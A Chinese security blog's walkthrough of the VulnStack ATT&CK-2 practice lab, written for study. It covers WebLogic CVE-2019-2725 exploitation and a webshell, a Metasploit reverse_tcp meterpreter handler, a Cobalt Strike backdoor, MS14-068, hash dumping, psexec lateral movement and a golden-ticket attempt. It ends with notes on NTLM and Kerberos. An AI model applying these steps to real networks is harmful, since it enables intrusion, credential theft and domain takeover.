<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1655090890230.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1655090890230.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="开坑第二个VulnStack靶场，仅供学习交流">
<meta property="og:type" content="article">
<meta property="og:title" content="[靶场练习]ATT&amp;CK-2">
<meta property="og:url" content="http://example.com/2022/10/06/ATT&CK-2/index.html">
<meta property="og:site_name" content="Security">
<meta property="og:description" content="开坑第二个VulnStack靶场，仅供学习交流">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/HEgvrPU9caLBDmk.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/gRXmaGIwVjbdWqs.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/eOBgvMxaVGr8dDy.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/D71XfkTescQSp4B.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/kl7SyBDeq6iZW9p.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/9nj8HuavRIP1F6V.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/61HLulxhgyieJw4.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/yoPAbOw8v6lnQKa.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/NmDj1iBkThMrOlJ.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/gM8ZP7mqSXGe1EB.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/wy4olbavKtjNYf5.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/zhmUHNejcoty8uZ.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/yKqlYo1NnjEw5iW.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/LkCqdor5JpuGM1x.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/y8cHqDwUA6hZWEb.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/b8BaoFDeQkSJKzl.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/6uSZoHF4cQJ13Ly.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/KaEqIuT64SFwj8O.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/vISCVgTeYW5lmEB.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/JK31OkezvFZjqU4.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/bA1hVnPUq2gEk7B.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/FpZTd2gbHi3loIR.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/hQo2KXvAtWlRsES.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/3S4Y1RHJl5K8zXP.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/1Zdhv2sXF3fW6PC.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/howdO7kiAvpb6ft.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/EStVD6Yn95IJToR.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/N6iLXrejMAEfgsG.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/XNFnwi7bOUYIkKW.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/06/WN5dwpAacniJQE7.png">
<meta property="article:published_time" content="2022-10-06T14:30:11.145Z">
<meta property="article:modified_time" content="2022-11-02T12:29:24.018Z">
<meta property="article:author" content="l3ife">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/10/06/HEgvrPU9caLBDmk.png">

<link rel="canonical" href="http://example.com/2022/10/06/ATT&CK-2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>[靶场练习]ATT&CK-2 | Security</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Security</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">7</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">18</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/10/06/ATT&CK-2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="l3ife">
      <meta itemprop="description" content="谁想当安全混子呢">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [靶场练习]ATT&CK-2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-10-06 22:30:11" itemprop="dateCreated datePublished" datetime="2022-10-06T22:30:11+08:00">2022-10-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-02 20:29:24" itemprop="dateModified" datetime="2022-11-02T20:29:24+08:00">2022-11-02</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <div class="post-description">开坑第二个VulnStack靶场，仅供学习交流</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h1><p>红日靶机系列是完全模拟ATT&amp;CK攻击链路来搭建的，VulStack2主要涉及Access Token利用WMI利用、域漏洞利用SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据&#x2F;白银票据&#x2F;Sid History&#x2F;MOF等攻防技术等知识</p>
<p><img src="https://s2.loli.net/2022/10/06/HEgvrPU9caLBDmk.png" alt="image.png"></p>
<h1 id="0x01-靶场环境搭建"><a href="#0x01-靶场环境搭建" class="headerlink" title="0x01 靶场环境搭建"></a>0x01 靶场环境搭建</h1><p>靶场中包含三台靶机，具体的网络拓扑图如下</p>
<p><img src="https://s2.loli.net/2022/10/06/gRXmaGIwVjbdWqs.png" alt="image.png"></p>
<p>配置需求：</p>
<p>1.外网统一为桥接模式，内网设置为仅主机模式</p>
<p>2.WEB外网服务器需要打开weblogic服务，路径为C:\Oracle\Middleware\user_projects\domains\base_domain\bin，将startWeblogic打开</p>
<p>3.三台靶机的默认开机密码都为1qaz@WSX，管理员账号密码：Administrator&#x2F;1qaz@WSX，WEB外网服务器需单独使用de1ay&#x2F;1qaz@WSX登录</p>
<p>访问192.168.50.238:7001&#x2F;console,出现weblogic页面，漏洞环境搭建成功</p>
<h1 id="0x02-WEB外网打点"><a href="#0x02-WEB外网打点" class="headerlink" title="0x02 WEB外网打点"></a>0x02 WEB外网打点</h1><p>arp-scan -l 扫描同网段</p>
<p><img src="https://s2.loli.net/2022/10/06/eOBgvMxaVGr8dDy.png" alt="image.png"></p>
<p>对WEB服务器进行扫描：</p>
<p>nmap -sS -v 192.168.50.238半开放扫描端口</p>
<p><img src="https://s2.loli.net/2022/10/06/D71XfkTescQSp4B.png" alt="image.png"></p>
<p>开启了80、445、1433、3389、7001端口</p>
<p>开放了HTTP服务、SQL Server服务、Weblogic服务</p>
<p>对PC服务器扫描端口开启了Mysql服务</p>
<p>对WEB服务器使用weblogic的漏洞路径进行验证，发现存在weblogic漏洞</p>
<pre><code>1./wls-wsat/CoordinatorPortType
2./wls-wsat/CoordinatorPortType11
/_async/AsyncResponseService
</code></pre>
<p>使用CVE-2019-2725对Weblogic页面进行测试，尝试之后使用MSF连接不了，才明白MSF攻击目标为Unix</p>
<p>拿JAVA反序列化工具上传Webshell</p>
<p><img src="https://s2.loli.net/2022/10/06/kl7SyBDeq6iZW9p.png" alt="image.png"></p>
<p>冰蝎派生会话给MSF</p>
<pre><code>1.use exploit/multi/handler
2.set payload java/meterpreter/reverse_tcp
3.set lhost 192.168.50.246
4.set lport 4444
</code></pre>
<p>并通过MSF上传CS生成的后门</p>
<p><img src="https://s2.loli.net/2022/10/06/9nj8HuavRIP1F6V.png" alt="image.png"></p>
<p>并且在CS上监听后门的端口5555</p>
<p><img src="https://s2.loli.net/2022/10/06/61HLulxhgyieJw4.png" alt="image.png"></p>
<p>使用MSF执行后门exe（360免杀，暂时没学，先关闭360）</p>
<h1 id="0x03-内网渗透"><a href="#0x03-内网渗透" class="headerlink" title="0x03 内网渗透"></a>0x03 内网渗透</h1><p><img src="https://s2.loli.net/2022/10/06/yoPAbOw8v6lnQKa.png" alt="image.png"></p>
<p>当前为Administrator权限，使用MS14-068提权</p>
<p><img src="https://s2.loli.net/2022/10/06/NmDj1iBkThMrOlJ.png" alt="image.png"></p>
<p>获取hash值</p>
<p><img src="https://s2.loli.net/2022/10/06/gM8ZP7mqSXGe1EB.png" alt="image.png"></p>
<p>Ipconfig 存在192.168.50.0&#x2F;24和10.10.10.0&#x2F;24网段,域控为10.10.10.10</p>
<p><img src="https://s2.loli.net/2022/10/06/wy4olbavKtjNYf5.png" alt="image.png"></p>
<p>查询域内用户</p>
<p><img src="https://s2.loli.net/2022/10/06/zhmUHNejcoty8uZ.png" alt="image.png"></p>
<p>查看域控</p>
<p><img src="https://s2.loli.net/2022/10/06/yKqlYo1NnjEw5iW.png" alt="image.png"></p>
<p>域内其他成员主机名</p>
<p><img src="https://s2.loli.net/2022/10/06/LkCqdor5JpuGM1x.png" alt="image.png"></p>
<p>查看域管理用户</p>
<p><img src="https://s2.loli.net/2022/10/06/y8cHqDwUA6hZWEb.png" alt="image.png"></p>
<p>PC和DC的IP</p>
<p><img src="https://s2.loli.net/2022/10/06/b8BaoFDeQkSJKzl.png" alt="image.png"></p>
<p>存在域环境，域名为de1ay.com，存在两台域主机WEB和PC，域控制器为DC.de1ay.com，主机名为DC，域管理员为Administrator</p>
<p>拿域控的权限，kali无法通过WEB服务器访问DC控制器，进行socks代理</p>
<p><img src="https://s2.loli.net/2022/10/06/6uSZoHF4cQJ13Ly.png" alt="image.png"></p>
<p>修改&#x2F;etc&#x2F;proxychains.conf</p>
<p><img src="https://s2.loli.net/2022/10/06/KaEqIuT64SFwj8O.png" alt="image.png"></p>
<p>代理使用nc命令探测，发现可以连通</p>
<p><img src="https://s2.loli.net/2022/10/06/vISCVgTeYW5lmEB.png" alt="image.png"></p>
<p>进行nmap端口扫描</p>
<p><img src="https://s2.loli.net/2022/10/06/JK31OkezvFZjqU4.png" alt="image.png"></p>
<p><img src="https://s2.loli.net/2022/10/06/bA1hVnPUq2gEk7B.png" alt="image.png"></p>
<p>两台内网主机均开启445端口</p>
<h2 id="psexec横向移动"><a href="#psexec横向移动" class="headerlink" title="psexec横向移动"></a>psexec横向移动</h2><p>1.原理：基于IPC共享，能够在没有开启telnet服务返回半交互的命令行</p>
<p>2.前提条件：目标开启445端口，启动psexec建立连接</p>
<p>在CS上创建listener</p>
<p><img src="https://s2.loli.net/2022/10/06/FpZTd2gbHi3loIR.png" alt="image.png"></p>
<p>对DC进行psexec传递攻击</p>
<p><img src="https://s2.loli.net/2022/10/06/hQo2KXvAtWlRsES.png" alt="image.png"></p>
<p><img src="https://s2.loli.net/2022/10/06/3S4Y1RHJl5K8zXP.png" alt="image.png"></p>
<p>发现主机DC上线</p>
<p><img src="https://s2.loli.net/2022/10/06/1Zdhv2sXF3fW6PC.png" alt="image.png"></p>
<p>同理，使用psexc将PC上线</p>
<h2 id="黄金票据制作（未成功）"><a href="#黄金票据制作（未成功）" class="headerlink" title="黄金票据制作（未成功）"></a>黄金票据制作（未成功）</h2><p>黄金票据</p>
<pre><code>黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限
</code></pre>
<p>前提条件</p>
<pre><code>1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
</code></pre>
<p>获得KRBTGT账户NTLM密码哈希</p>
<p><img src="https://s2.loli.net/2022/10/06/howdO7kiAvpb6ft.png" alt="image.png"></p>
<p>获取SID</p>
<p><img src="https://s2.loli.net/2022/10/06/EStVD6Yn95IJToR.png" alt="image.png"></p>
<p>WEB机 Administrator 右键-&gt;Access-&gt;Golden Ticket</p>
<p><img src="https://s2.loli.net/2022/10/06/N6iLXrejMAEfgsG.png" alt="image.png"></p>
<p><img src="https://s2.loli.net/2022/10/06/XNFnwi7bOUYIkKW.png" alt="image.png"></p>
<h1 id="0x04-知识"><a href="#0x04-知识" class="headerlink" title="0x04 知识"></a>0x04 知识</h1><h2 id="NTLM原理"><a href="#NTLM原理" class="headerlink" title="NTLM原理"></a>NTLM原理</h2><p><strong>原理</strong></p>
<p>Window安全认证常见的为NTLM认证和Kerberos认证。NTLM采用一种质询&#x2F;问答信息交换模式</p>
<p><strong>过程</strong></p>
<p>1.步骤一</p>
<p>用户输入用户名和密码登入服务器，登录之前，客户端会将缓存密码的哈希值，原始密码会被丢弃。客户端向服务器发送访问资源，会向服务器发送一个请求，请求中包含明文的用户名。</p>
<p>2.步骤二</p>
<p>服务器收到请求后，生成一个16位的随机数，叫challenge</p>
<p>3.步骤三</p>
<p>客户端收到chanllenge，会利用步骤一生成的哈希值进行加密，返回服务器一个加密后的challenge</p>
<p>4.步骤四</p>
<p>服务器收到加密后的challenge，会向DC发送针对客户端的验证请求，请求包含用户的用户名、加密前的challenge、加密后的challenge</p>
<p>5.步骤五</p>
<p>DC根据用户名获取该帐号的密码哈希值，对原始的Challenge进行加密。如果加密后的Challenge和服务器发送的一致，则意味着用户拥有正确的密码，验证通过，否则验证失败</p>
<h2 id="Kerberos-域用户提权漏洞（MS14-068）"><a href="#Kerberos-域用户提权漏洞（MS14-068）" class="headerlink" title="Kerberos 域用户提权漏洞（MS14-068）"></a>Kerberos 域用户提权漏洞（MS14-068）</h2><p><strong>Kerberos协议</strong></p>
<p>Kerberos协议是计算机网络认证协议，允许某实体在不安全的环境下通信，向另一个实体以一种安全的方式证明自己身份。Kerberos服务器又称为密钥分发中心或KDC</p>
<p><strong>工作原理</strong></p>
<p>1.认证服务器（Authentication Server，简称 AS）：验证Client端的身份（确定你是身份证上的本人），验证通过就会给一张票证授予票证（Ticket Granting Ticket，简称 TGT）给 Client</p>
<p>2.一个票据授权服务器（Ticket Granting Server，简称 TGS）：通过 TGT（AS 发送给 Client 的票）获取访问 Server 端的票（Server Ticket，简称 ST）。ST（Service Ticket）也有资料称为 TGS Ticket</p>
<p><img src="https://s2.loli.net/2022/10/06/WN5dwpAacniJQE7.png" alt="image.png"></p>
<p>其可以为坐高铁，先买票(AS)，然后通过验票机(TGS)，随后在上火车那还需要验票过程(ST)</p>
<h1 id="0x05-参考"><a href="#0x05-参考" class="headerlink" title="0x05 参考"></a>0x05 参考</h1><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/293184.html">MSF打的靶场</a></p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1496451">kerberos原理</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>l3ife
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/10/06/ATT&CK-2/" title="[靶场练习]ATT&amp;CK-2">http://example.com/2022/10/06/ATT&CK-2/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/10/05/%E6%97%A5%E8%AE%B0-20221005/" rel="prev" title="2022/10/05">
      <i class="fa fa-chevron-left"></i> 2022/10/05
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/10/10/BUUCTF%E5%88%B7%E9%A2%98/" rel="next" title="[RCTF 2019]Nextphp（PHP7.4特性）">
      [RCTF 2019]Nextphp（PHP7.4特性） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.</span> <span class="nav-text">0x00 介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.</span> <span class="nav-text">0x01 靶场环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-WEB%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9"><span class="nav-number">3.</span> <span class="nav-text">0x02 WEB外网打点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="nav-number">4.</span> <span class="nav-text">0x03 内网渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#psexec%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="nav-number">4.1.</span> <span class="nav-text">psexec横向移动</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%88%B6%E4%BD%9C%EF%BC%88%E6%9C%AA%E6%88%90%E5%8A%9F%EF%BC%89"><span class="nav-number">4.2.</span> <span class="nav-text">黄金票据制作（未成功）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-%E7%9F%A5%E8%AF%86"><span class="nav-number">5.</span> <span class="nav-text">0x04 知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#NTLM%E5%8E%9F%E7%90%86"><span class="nav-number">5.1.</span> <span class="nav-text">NTLM原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Kerberos-%E5%9F%9F%E7%94%A8%E6%88%B7%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%EF%BC%88MS14-068%EF%BC%89"><span class="nav-number">5.2.</span> <span class="nav-text">Kerberos 域用户提权漏洞（MS14-068）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-%E5%8F%82%E8%80%83"><span class="nav-number">6.</span> <span class="nav-text">0x05 参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">l3ife</p>
  <div class="site-description" itemprop="description">谁想当安全混子呢</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
	  

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">l3ife</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
